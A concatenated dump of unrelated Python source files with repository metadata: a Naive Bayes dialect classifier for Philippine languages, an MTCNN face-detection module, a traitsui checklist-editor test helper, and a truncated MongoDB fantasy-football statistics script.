,'nga','pareho','pud','sila','siya','unsa','sa','ug','nang', 'ng','diay', 'atu', 'mo'))
sentence = new.lower()
new_str = ' '.join([word for word in sentence.split(' ') if word not in stop_words_lst])
return new_str
def train_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
warays = Dialect.objects.filter(dialect='Waray')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
war_count = 1
for waray in warays:
for user_input in user_inputs:
if waray.word == user_input:
war_count *= (1 + 1) / (waray_count + doc_count)
return war_count
def train_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
cebus = Dialect.objects.filter(dialect='Cebuano')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
ceb_count = 1
for cebu in cebus:
for user_input in user_inputs:
if cebu.word == user_input:
ceb_count *= (1 + 1) / (cebu_count + doc_count)
return ceb_count
def train_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
hiligs = Dialect.objects.filter(dialect='Hiligaynon')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
hil_count = 1
for hilig in hiligs:
for user_input in user_inputs:
if hilig.word == user_input:
hil_count *= (1 + 1) / (hili_count + doc_count)
return hil_count
def smooth_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_war = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Waray').exists():
pass
else:
smooth_war *= 1 / (waray_count + doc_count)
return smooth_war
def smooth_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_ceb = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Cebuano').exists():
pass
else:
smooth_ceb *= 1 / (cebu_count + doc_count)
return smooth_ceb
def smooth_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_hil = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Hiligaynon').exists():
pass
else:
smooth_hil *= 1 / (hili_count + doc_count)
return smooth_hil
def multi_words(war_count, ceb_count, hil_count, smooth_war, smooth_ceb, smooth_hil):
waray_count = Dialect.objects.filter(dialect='Waray').count()
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
priorLogWar = waray_count/doc_count
priorLogCeb = cebu_count/doc_count
priorLogHil = hili_count/doc_count
war_val = 0
ceb_val = 0
hil_val = 0
if war_count == 1:
war_val *= war_count
else:
war_val = war_count * smooth_war * priorLogWar
if ceb_count == 1:
ceb_val *= ceb_count
else:
ceb_val = ceb_count * smooth_ceb * priorLogCeb
if hil_count == 1:
hil_val *= hil_count
else:
hil_val = hil_count * smooth_hil * priorLogHil
if war_val > ceb_val and war_val > hil_val:
return 'Waray'
elif ceb_val > war_val and ceb_val > hil_val:
return 'Cebuano'
elif hil_val > war_val and hil_val > ceb_val:
return 'Hiligaynon'
elif war_val and ceb_val and hil_val == 0:
return 'Word does not exist' | eymkarla/thesisrepo | classifier/NB.py | NB.py | py | 4,535 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "nltk.download",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwor... |
72000467069 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import builtins
import gc
import os
import time
import numpy as np
import torch
from trident.backend.common import *
from trident.backend.opencv_backend import image2array
from trident.backend.pytorch_backend import *
from trident.backend.pytorch_backend import Layer, Sequential, load, get_device, fix_layer
from trident.backend.pytorch_ops import *
from trident.data.image_common import *
from trident.data.utils import download_model_from_google_drive
from trident.data.vision_transforms import Normalize
from trident.layers.pytorch_activations import PRelu
from trident.layers.pytorch_layers import *
from trident.layers.pytorch_pooling import *
from trident.optims.pytorch_trainer import ImageDetectionModel
__all__ = ['Pnet', 'Rnet', 'Onet', 'Mtcnn']
_session = get_session()
_device = get_device()
_epsilon = _session.epsilon
_trident_dir = _session.trident_dir
dirname = os.path.join(_trident_dir, 'models')
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError:
# Except permission denied and potential race conditions
# in multi-threaded environments.
pass
def p_net():
return Sequential(
Conv2d((3, 3), 10, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((2, 2), strides=2, auto_pad=False),
Conv2d((3, 3), 16, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
ModuleDict(
{'confidence': Conv2d((1, 1), 1, strides=1, auto_pad=False, use_bias=True, activation='sigmoid',
name='conv4_1'),
'box': Conv2d((1, 1), 4, strides=1, auto_pad=False, use_bias=True, name='conv4_2'),
'landmark': Conv2d((1, 1), 10, strides=1, auto_pad=False, use_bias=True, name='conv4_3')},
is_multicasting=True)
, name='pnet')
def r_net():
return Sequential(
Conv2d((3, 3), 28, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 48, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((2, 2), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
Flatten(),
Dense(128, activation=None, use_bias=True, name='conv4'),
PRelu(num_parameters=1),
ModuleDict({
'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv5_1'),
'box': Dense(4, activation=None, use_bias=True, name='conv5_2'),
'landmark': Dense(10, activation=None, use_bias=True, name='conv5_3')}, is_multicasting=True)
, name='rnet')
def o_net():
return Sequential(
Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
MaxPool2d((2, 2), strides=2, auto_pad=False),
Conv2d((2, 2), 128, strides=1, auto_pad=False, use_bias=True, name='conv4'),
PRelu(num_parameters=1),
Flatten(),
Dense(256, activation=None, use_bias=True, name='conv5'),
PRelu(num_parameters=1),
ModuleDict({
'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv6_1'),
'box': Dense(4, activation=None, use_bias=True, name='conv6_2'),
'landmark': Dense(10, activation=None, use_bias=True, name='conv6_3')}, is_multicasting=True)
, name='onet')
def Pnet(pretrained=True,
input_shape=(3, 12, 12),
freeze_features=True,
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 12, 12)
pnet = ImageDetectionModel(input_shape=input_shape, output=p_net())
pnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1w9ahipO8D9U1dAXMc2BewuL0UqIBYWSX', dirname, 'pnet.pth')
recovery_model = fix_layer(load(os.path.join(dirname, 'pnet.pth')))
pnet.model = recovery_model
pnet.model.input_shape = input_shape
pnet.model.to(_device)
return pnet
def Rnet(pretrained=True,
input_shape=(3, 24, 24),
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 24, 24)
rnet = ImageDetectionModel(input_shape=input_shape, output=r_net())
rnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1CH7z133_KrcWMx9zXAblMCV8luiQ3wph', dirname, 'rnet.pth')
recovery_model = load(os.path.join(dirname, 'rnet.pth'))
recovery_model = fix_layer(recovery_model)
recovery_model.to(_device)
rnet.model = recovery_model
return rnet
def Onet(pretrained=True,
input_shape=(3, 48, 48),
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 48, 48)
onet = ImageDetectionModel(input_shape=(3, 48, 48), output=o_net())
onet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1a1dAlSzJOAfIz77Ic38JMQJYWDG_b7-_', dirname, 'onet.pth')
recovery_model = load(os.path.join(dirname, 'onet.pth'))
recovery_model = fix_layer(recovery_model)
recovery_model.to(_device)
onet.model = recovery_model
return onet
class DetectorHead(Layer):
def __init__(self, cellsize=12, threshold=0.5, min_size=5, **kwargs):
super(DetectorHead, self).__init__(**kwargs)
self.cellsize = cellsize
self.detection_threshold = threshold
self.min_size = min_size
self._built = True
def forward(self, input, **kwargs):
boxprobs, boxregs, landscape = input.value_list
boxprobs = boxprobs[0]
height, width = boxprobs.shape[1:]
if boxprobs.size(0) == 2:
boxprobs = boxprobs[1:, :, :]
strides = 2
boxregs = boxregs[0]
input_shape = boxprobs.size()
grid = meshgrid(boxprobs.size(1), boxprobs.size(2))
grid = grid.view(2, -1)
score = boxprobs[0]
y, x = torch.where(score >= self.detection_threshold)
boxregs = boxregs.permute(1, 2, 0)
score = score[(y, x)]
reg = boxregs[(y, x)].transpose(1, 0)
bb = torch.stack([x, y], dim=0)
q1 = (strides * bb + 1)
q2 = (strides * bb + self.cellsize - 1 + 1)
w = q2[0, :] - q1[0, :] + 1
h = q2[1, :] - q1[1, :] + 1
b1 = q1[0, :] + reg[0, :] * w
b2 = q1[1, :] + reg[1, :] * h
b3 = q2[0, :] + reg[2, :] * w
b4 = q2[1, :] + reg[3, :] * h
boxs = torch.stack([b1, b2, b3, b4, score], dim=-1)
# keep =torchvision.ops.boxes.remove_small_boxes(boxs[:,:4],min_size=self.min_size)
# boxs=boxs[keep]
# print('total {0} boxes cutoff={1} '.format(len(x), cutoff))
if boxs is None or len(boxs.size()) == 0:
return None
elif len(boxs.size()) == 1:
boxs = boxs.unsqueeze(0)
return boxs
def remove_useless_boxes(boxes, image_size=None, min_size=5):
height, width = image_size if image_size is not None else (None, None)
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
boxes = boxes[area > min_size * min_size]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
greater0 = x1.gt(0).float() * x2.gt(0).float() * y1.gt(0).float() * y1.gt(0).float()
boxes = boxes[greater0 > 0]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
w = (x2 - x1)
boxes = boxes[w > 1]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
h = (y2 - y1)
boxes = boxes[h > 1]
return boxes
class Mtcnn(ImageDetectionModel):
def __init__(self, pretrained=True, min_size=10, detection_threshold=(0.4, 0.7, 0.9), nms_threshold=(0.9, 0.8, 0.5),
**kwargs):
self.pnet = Pnet(pretrained=pretrained, input_shape=(3, 12, 12)).model
self.rnet = Rnet(pretrained=pretrained, input_shape=(3, 24, 24)).model
self.onet = Onet(pretrained=pretrained, input_shape=(3, 48, 48)).model
super(Mtcnn, self).__init__(input_shape=(3, 12, 12), output=self.pnet)
self.min_size = min_size
self.detection_threshold = detection_threshold
self.nms_threshold = nms_threshold
self.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
def get_image_pyrimid(self, img, min_size=None, factor=0.709):
if min_size is None:
min_size = self.min_size
min_face_area = (min_size, min_size)
h = img.shape[0]
w = img.shape[1]
minl = np.amin([h, w])
m = 12.0 / min_size
minl = minl * m
# 收集縮放尺度以及對應縮圖
scales = []
images = []
factor_count = 0
while minl >= 12:
scales += [m * np.power(factor, factor_count)]
scaled_img = rescale(scales[-1])(img.copy())
images.append(scaled_img)
minl = minl * factor
factor_count += 1
return images, scales
def generate_bboxes(self, probs, offsets, scale, threshold):
"""
基於Pnet產生初始的候選框
"""
stride = 2
cell_size = 12
# 透過np.where挑出符合基於門檻值的特徵圖位置(xy座標)
inds = where(probs > threshold)
'''
>>> a =np.array([[1,2,3],[4,5,6]])
>>> np.where(a>1)
(array([0, 0, 1, 1, 1]), array([1, 2, 0, 1, 2]))
'''
# 如果沒有區域滿足機率門檻值,則傳回空array
if inds[0].size == 0:
return np.array([])
# 根據pnet輸出的offset區域產生對應的x1,y1,x2,y2座標
tx1, ty1, tx2, ty2 = [offsets[0, i, inds[0], inds[1]] for i in range(4)]
offsets = stack([tx1, ty1, tx2, ty2], axis=-1)
# 以及抓出對應的機率值
score = probs[inds[0], inds[1]]
# 由於Pnet輸入的是基於圖像金字塔縮放尺度對應的圖片,因此需要根據縮放尺度來調整候選框座標,以還原成真實圖片的尺度
# 根據 候選框、機率值、offset來排列
bounding_boxes = concate([
round((stride * inds[1] + 1.0) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0) / scale).expand_dims(-1),
round((stride * inds[1] + 1.0 + cell_size) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0 + cell_size) / scale).expand_dims(-1),
score.expand_dims(-1), offsets
], axis=-1)
print(bounding_boxes.shape)
# 將bounding_boxes由原本[框屬性數量,框個數]的形狀轉置為[框個數,框屬性數量]
return bounding_boxes
def convert_to_square(self, bboxes):
"""Convert bounding boxes to a square form.
Arguments:
bboxes: a float numpy array of shape [n, 5].
Returns:
a float numpy array of shape [n, 5],
squared bounding boxes.
"""
square_bboxes = zeros_like(bboxes)
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
h = y2 - y1 + 1.0
w = x2 - x1 + 1.0
max_side = maximum(h, w)
square_bboxes[:, 0] = x1 + w * 0.5 - max_side * 0.5
square_bboxes[:, 1] = y1 + h * 0.5 - max_side * 0.5
square_bboxes[:, 2] = square_bboxes[:, 0] + max_side - 1.0
square_bboxes[:, 3] = square_bboxes[:, 1] + max_side - 1.0
return square_bboxes
# 校準候選框座標
# 將offset對應至圖片長寬的線性縮放來獲得更新的候選框精調後座標
def calibrate_box(self, bboxes, offsets):
"""Transform bounding boxes to be more like true bounding boxes.
'offsets' is one of the outputs of the nets.
Arguments:
bboxes: a float numpy array of shape [n, 5].
offsets: a float numpy array of shape [n, 4].
Returns:
a float numpy array of shape [n, 5].
"""
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
w = x2 - x1 + 1.0
h = y2 - y1 + 1.0
# w [w_len, 1]
w = expand_dims(w, 1)
# h [h_len, 1]
h = expand_dims(h, 1)
translation = concate([w, h, w, h], axis=-1) * offsets
bboxes[:, 0:4] = bboxes[:, 0:4] + translation
return bboxes
# 基於tensor計算nms
def nms(self, box_scores, overlap_threshold=0.5, top_k=-1):
"""Non-maximum suppression.
Arguments:
box_scores: a float numpy array of shape [n, 5],
where each row is (xmin, ymin, xmax, ymax, score).
overlap_threshold: a float number.
Returns:
list with indices of the selected boxes
"""
# 計算面積
def area_of(left_top, right_bottom):
"""Compute the areas of rectangles given two corners.
Args:
left_top (N, 2): left top corner.
right_bottom (N, 2): right bottom corner.
Returns:
area (N): return the area.
"""
hw = right_bottom - left_top
return clip(hw[..., 0], min=0) * clip(hw[..., 1], min=0)
# 計算IOU(交集/聯集)
def iou_of(boxes0, boxes1, eps=1e-5):
"""Return intersection-over-union (Jaccard index) of boxes.
Args:
boxes0 (N, 4): ground truth boxes.
boxes1 (N or 1, 4): predicted boxes.
eps: a small number to avoid 0 as denominator.
Returns:
iou (N): IoU values.
"""
overlap_left_top = maximum(boxes0[..., :2], boxes1[..., :2])
overlap_right_bottom = minimum(boxes0[..., 2:], boxes1[..., 2:])
overlap_area = area_of(overlap_left_top, overlap_right_bottom)
area0 = area_of(boxes0[..., :2], boxes0[..., 2:])
area1 = area_of(boxes1[..., :2], boxes1[..., 2:])
return overlap_area / (area0 + area1 - overlap_area + eps)
# 如果沒有有效的候選區域則回傳空的清單
box_scores = to_tensor(box_scores)
if len(box_scores) == 0:
return []
score = box_scores[:, 4]
boxes = box_scores[:, :4]
# 存放過關的索引值
picked = []
# 依照機率信心水準升冪排序
indexes = argsort(score, descending=False)
while len(indexes) > 0:
# 如此一來,最後一筆即是信心水準最高值
# 加入至過關清單中
current = indexes[-1]
picked.append(current.item())
# 計算其餘所有候選框與此當前框之間的IOU
if 0 < top_k == len(picked) or len(indexes) == 1:
break
current_box = boxes[current, :]
current_score = score[current]
# 除了最後一筆以外的都是其餘框
indexes = indexes[:-1]
rest_boxes = boxes[indexes, :]
iou = iou_of(
rest_boxes,
expand_dims(current_box, axis=0),
)
# IOU未超過門檻值的表示未與當前框重疊,則留下,其他排除
indexes = indexes[iou <= overlap_threshold]
return picked
def detect(self, image):
"""
Arguments:
image: 基於RGB排列的圖像(可以是路徑或是numpy向量)
Returns:
輸出為候選框以及對應的五官特徵點
"""
# 暫存此原圖
image = image2array(image)
self.image = image
self.height, self.width = image.shape[:2]
min_length = min(self.height, self.width)
# 第一階段: 候選 pnet
bounding_boxes = []
# 先計算圖像金字塔的各個縮放比率
images, scales = self.get_image_pyrimid(image, min_size=self.min_size, factor=0.707)
# 每個縮放比率各執行一次Pnet(全卷積網路)
for img, scale in zip(images, scales):
# 生成該尺度下的候選區域
# 透過機率值門檻做篩選後再透過nms去重複
boxes = self.run_first_stage(img, scale)
print('Scale:', builtins.round(scale * 10000) / 10000.0, 'Scaled Images:', img.shape, 'bboxes:', len(boxes),
flush=True)
if boxes.ndim == 1:
boxes.expand_dims(0)
bounding_boxes.append(boxes)
# 將各個尺度所檢測到的候選區域合併後
bounding_boxes = [i for i in bounding_boxes if i is not None]
bounding_boxes = concate(bounding_boxes, axis=0)
print('totl bboxes:', len(bounding_boxes))
# 將候選框的座標做一下校準後再進行nms
bounding_boxes = self.calibrate_box(bounding_boxes[:, 0:5], bounding_boxes[:, 5:])
keep = self.nms(bounding_boxes[:, 0:5], self.nms_threshold[0])
bounding_boxes = bounding_boxes[keep]
# 將框盡可能調整成正方形
bounding_boxes = self.convert_to_square(bounding_boxes)
bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4])
print('totl bboxes after nms:', len(bounding_boxes))
# # 將這階段的候選框圖輸出
# pnet_img = self.image.copy()
# for box in bounding_boxes[:, :4]:
# pnet_img = plot_one_box(box, pnet_img, (255, 128, 128), None, 1)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(pnet_img.astype(np.uint8))
if is_gpu_available():
torch.cuda.synchronize()
torch.cuda.empty_cache()
gc.collect()
# 第二階段: 精調 rnet
# 將第一階段留下來的候選框區域挖下來,縮放成24*24大小,交給rnet做確認以及框座標精調
img_boxes = self.get_image_boxes(bounding_boxes, size=24)
print('RNet!')
probs = []
offsets = []
if len(img_boxes) > 16:
for i in range(len(img_boxes) // 16 + 1):
if i * 16< len(img_boxes):
output = self.rnet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
probs.append(to_numpy(output['confidence']))
offsets.append(to_numpy(output['box']))
del output
probs = np.concatenate(probs, axis=0)
offsets =np.concatenate(offsets, axis=0)
else:
output = self.rnet(to_tensor(img_boxes))
probs = to_numpy(output['confidence']) # 形狀為 [n_boxes, 1]
offsets = to_numpy(output['box']) # 形狀為 [n_boxes, 4]
# 根據機率門檻值排除機率值較低的框
keep = np.where(probs[:, 0] > self.detection_threshold[1])[0]
bounding_boxes = to_numpy(bounding_boxes)[keep]
bounding_boxes=np.concatenate([bounding_boxes[:,:4],probs[keep, 0].reshape((-1,1))],axis=1)
#bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
offsets = offsets[keep]
print('totl bboxes:', len(bounding_boxes))
# 將框的座標做精調後再進行nms
bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
keep = self.nms(bounding_boxes, self.nms_threshold[1])
bounding_boxes = bounding_boxes[keep]
# 將框盡可能調整成正方形
bounding_boxes = self.convert_to_square(bounding_boxes)
bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4]).copy()
print('totl bboxes after nms:', len(bounding_boxes))
# # 將這階段的候選框圖輸出
# rnet_img = self.image.copy()
# for i in range(bounding_boxes.shape[0]):
# box = bounding_boxes[i, :4]
# rnet_img = plot_one_box(box, rnet_img, (255, 128, 128), None, 2)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(rnet_img.astype(np.uint8))
if is_gpu_available():
torch.cuda.synchronize()
torch.cuda.empty_cache()
gc.collect()
# 第三階段: 輸出 onet
img_boxes = self.get_image_boxes(bounding_boxes, size=48)
if len(img_boxes) == 0:
return [], []
print('ONet!')
probs = []
offsets = []
landmarks = []
if len(img_boxes) > 16:
for i in range(len(img_boxes) //16 + 1):
if i * 16 < len(img_boxes):
output = self.onet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
probs.append(output['confidence'].copy())
offsets.append(output['box'].copy())
landmarks.append(output['landmark'].copy())
del output
probs = concate(probs, axis=0)
offsets = concate(offsets, axis=0)
landmarks = concate(landmarks, axis=0)
else:
output = self.onet(to_tensor(img_boxes))
probs = output['confidence'] # 形狀為 [n_boxes, 1]
offsets = output['box'] # 形狀為 [n_boxes, 4]
# 只有這一階段需要檢視人臉特徵點
landmarks = output['landmark'] # 形狀為 [n_boxes, 10]
# 根據機率門檻值排除機率值較低的框
keep = where(probs[:, 0] > self.detection_threshold[2])[0]
bounding_boxes = bounding_boxes[keep]
bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
offsets = offsets[keep]
landmarks = landmarks[keep]
print('totl bboxes:', len(bounding_boxes))
# 將框的座標做精調後計算對應的臉部特徵點位置,然後再進行nms
bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
# 根據模型輸出計算人臉特徵點
width = bounding_boxes[:, 2] - bounding_boxes[:, 0] + 1.0
height = bounding_boxes[:, 3] - bounding_boxes[:, 1] + 1.0
xmin, ymin = bounding_boxes[:, 0], bounding_boxes[:, 1]
landmarks[:, 0:5] = expand_dims(xmin, 1) + expand_dims(width, 1) * landmarks[:, 0:5]
landmarks[:, 5:10] = expand_dims(ymin, 1) + expand_dims(height, 1) * landmarks[:, 5:10]
# 做最後一次nms
keep = self.nms(bounding_boxes, self.nms_threshold[2])
print('totl bboxes after nms:', len(bounding_boxes))
bounding_boxes = bounding_boxes[keep]
landmarks = landmarks[keep]
probs = probs[keep]
# # 將這階段的候選框圖輸出
# onet_img = self.image.copy()
# for i in range(bounding_boxes.shape[0]):
# box = bounding_boxes[i, :4]
# onet_img = plot_one_box(box, onet_img, (255, 128, 128), None, 2)
# for landmark in landmarks:
# landmarks_x = landmark[:5]
# landmarks_y = landmark[5:]
# for i in range(5):
# cv2.circle(onet_img, (int(landmarks_x[i]), int(landmarks_y[i])), 2, (255, 128, 255), 1)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(onet_img.astype(np.uint8))
gc.collect()
return self.image.copy(), bounding_boxes, probs, landmarks
# 執行第一階段
def run_first_stage(self, img, scale):
"""Run P-Net, generate bounding boxes, and do NMS.
Arguments:
img: an instance of PIL.Image.
scale: a float number,
scale width and height of the image by this number.
Returns:
a float numpy array of shape [n_boxes, 9],
bounding boxes with scores and offsets (4 + 1 + 4).
"""
sh, sw = img.shape[:2]
width, height = self.width, self.height
threshold = self.detection_threshold[0]
# 將圖像做基礎處理後送入pnet
for transform in self.preprocess_flow:
img = transform(img)
output = self.pnet(expand_dims(to_tensor(img), 0))
probs = output['confidence'][0, 0, :, :]
offsets = output['box']
# 根據全卷積網路輸出結果計算對應候選框座標
boxes = self.generate_bboxes(probs, offsets, scale, threshold)
# 在此尺度的候選框先做一次nms已有效減少候選框數量,這樣後續rnet, onet才不會GPU爆掉。
keep = self.nms(boxes[:, 0:5], overlap_threshold=self.nms_threshold[0])
boxes = boxes[keep].copy()
del output
return boxes
# 根據候選框座標至原圖挖取人臉圖像,已進行後續階段
def get_image_boxes(self, bounding_boxes, size=24):
"""Cut out boxes from the image.
Arguments:
bounding_boxes: a float numpy array of shape [n, 5].
size: an integer, size of cutouts.
Returns:
a float numpy array of shape [n, 3, size, size].
"""
num_boxes = len(bounding_boxes)
height, width = self.image.shape[:2]
# 宣告空白的img_boxes物件用來存放挖取的人臉圖像區域
img_boxes = np.zeros((num_boxes, 3, size, size), "float32")
n = 0
for i in range(num_boxes):
x1, y1, x2, y2 = bounding_boxes[i][:4]
try:
# 根據x1,y1,x2,y2座標,且座標必須大於零且小於等於圖像長寬的原則來挖取人臉區域
yy1 = int(builtins.max(y1, 0))
yy2 = int(builtins.min(y2, self.height))
xx1 = int(builtins.max(x1, 0))
xx2 = int(builtins.min(x2, self.width))
img_box = self.image[yy1:yy2, xx1:xx2, :]
if img_box.shape[0] != img_box.shape[1]:
# 若挖出非正方形則補滿為正方形
max_length = builtins.max(list(img_box.shape[:2]))
new_img_box = np.zeros((max_length, max_length, 3))
new_img_box[0:img_box.shape[0], 0:img_box.shape[1], :] = img_box
img_box = new_img_box
# 將正方形區域縮放後,經過預處理self.preprocess_flow後再塞入img_boxes
img_box = resize((size, size), keep_aspect=True)(img_box)
for transform in self.preprocess_flow:
img_box = transform(img_box)
img_boxes[i, :, :, :] = img_box
n += 1
except:
pass
# 列印一下成功挖取的區域數量(有可能座標本身不合理造成無法成功挖取)
print(n, 'image generated')
return img_boxes
def infer_single_image(self, img, **kwargs):
if self.model.built:
self.model.to(self.device)
self.model.eval()
image, boxes, probs, landmarks = self.detect(img)
return image, to_numpy(boxes), to_numpy(probs).astype(np.int32), to_numpy(landmarks)
def infer_then_draw_single_image(self, img):
start_time = time.time()
rgb_image, boxes, probs, landmark = self.infer_single_image(img)
if boxes is not None and len(boxes) > 0:
boxes = np.round(boxes).astype(np.int32)
if boxes.ndim == 1:
boxes = np.expand_dims(boxes, 0)
print(img, time.time() - start_time)
pillow_img = array2image(rgb_image.copy())
print(boxes, labels, flush=True)
if len(boxes) > 0:
for m in range(len(boxes)):
this_box = boxes[m]
this_label = 1
if int(this_label) > 0:
thiscolor = self.palette[1]
print('face', this_box, probs[m], flush=True)
pillow_img = plot_bbox(this_box, pillow_img, thiscolor, self.class_names[
int(this_label)] if self.class_names is not None else '', line_thickness=2)
rgb_image = np.array(pillow_img.copy())
return rgb_image, boxes, probs, landmark
| AllanYiin/trident | trident/models/pytorch_mtcnn.py | pytorch_mtcnn.py | py | 28,973 | python | en | code | 74 | github-code | 6 | [
{
"api_name": "trident.backend.pytorch_backend.get_device",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "... |
30358044871 | import wx
from traitsui.wx.check_list_editor import CustomEditor
from traitsui.testing.tester.command import MouseClick
from traitsui.testing.tester.locator import Index
from traitsui.testing.tester._ui_tester_registry._common_ui_targets import (
BaseSourceWithLocation,
)
from traitsui.testing.tester._ui_tester_registry._layout import (
column_major_to_row_major,
)
from traitsui.testing.tester._ui_tester_registry.wx import _interaction_helpers
class _IndexedCustomCheckListEditor(BaseSourceWithLocation):
"""Wrapper for CheckListEditor + Index"""
source_class = CustomEditor
locator_class = Index
handlers = [
(
MouseClick,
(
lambda wrapper, _: _interaction_helpers.mouse_click_checkbox_child_in_panel(
control=wrapper._target.source.control,
index=convert_index(
source=wrapper._target.source,
index=wrapper._target.location.index,
),
delay=wrapper.delay,
)
),
),
]
def convert_index(source, index):
"""Helper function to convert an index for a GridSizer so that the
index counts over the grid in the correct direction.
The grid is always populated in row major order, however, the elements
are assigned to each entry in the grid so that when displayed they appear
in column major order.
Sizers are indexed in the order they are populated, so to access
the correct element we may need to convert a column-major based index
into a row-major one.
Parameters
----------
control : CustomEditor
The Custom CheckList Editor of interest. Its control is the wx.Panel
containing child objects organized with a wx.GridSizer
index : int
the index of interest
"""
sizer = source.control.GetSizer()
if isinstance(sizer, wx.BoxSizer):
return index
n = len(source.names)
num_cols = sizer.GetCols()
num_rows = sizer.GetEffectiveRowsCount()
return column_major_to_row_major(index, n, num_rows, num_cols)
def register(registry):
"""Register interactions for the given registry.
If there are any conflicts, an error will occur.
Parameters
----------
registry : TargetRegistry
The registry being registered to.
"""
_IndexedCustomCheckListEditor.register(registry)
| enthought/traitsui | traitsui/testing/tester/_ui_tester_registry/wx/_traitsui/check_list_editor.py | check_list_editor.py | py | 2,444 | python | en | code | 290 | github-code | 6 | [
{
"api_name": "traitsui.testing.tester._ui_tester_registry._common_ui_targets.BaseSourceWithLocation",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "traitsui.wx.check_list_editor.CustomEditor",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "traitsui.testing... |
23934349151 | from pymongo import MongoClient
import pprint
import statistics
client = MongoClient('mongodb://localhost:27017/')
db = client.fantasypros
def find():
players = db.playersbywk.distinct("name")
for player in players:
getstats(player)
def getstats(player):
points = []
player_position = ''
projection = {"_id": 0, "total_points": 1, "position": 1}
query = {'name': player}
player_details = db.playersbywk.find(query, projection)
for player_detail in player_details:
points.append(player_detail['total_points'])
player_position = player_detail['position']
savestats(player, points, player_position)
def savestats(player, points, player_position):
player_dict = {}
player_dict['name'] = player
print("Player: " + player)
player_dict['position'] = player_position
print("Position: " + player_position)
player_dict['mean'] = str(statistics.mean(points))
print("Mean is: " + str(statistics.mean(points)))
if len(points) >= 2:
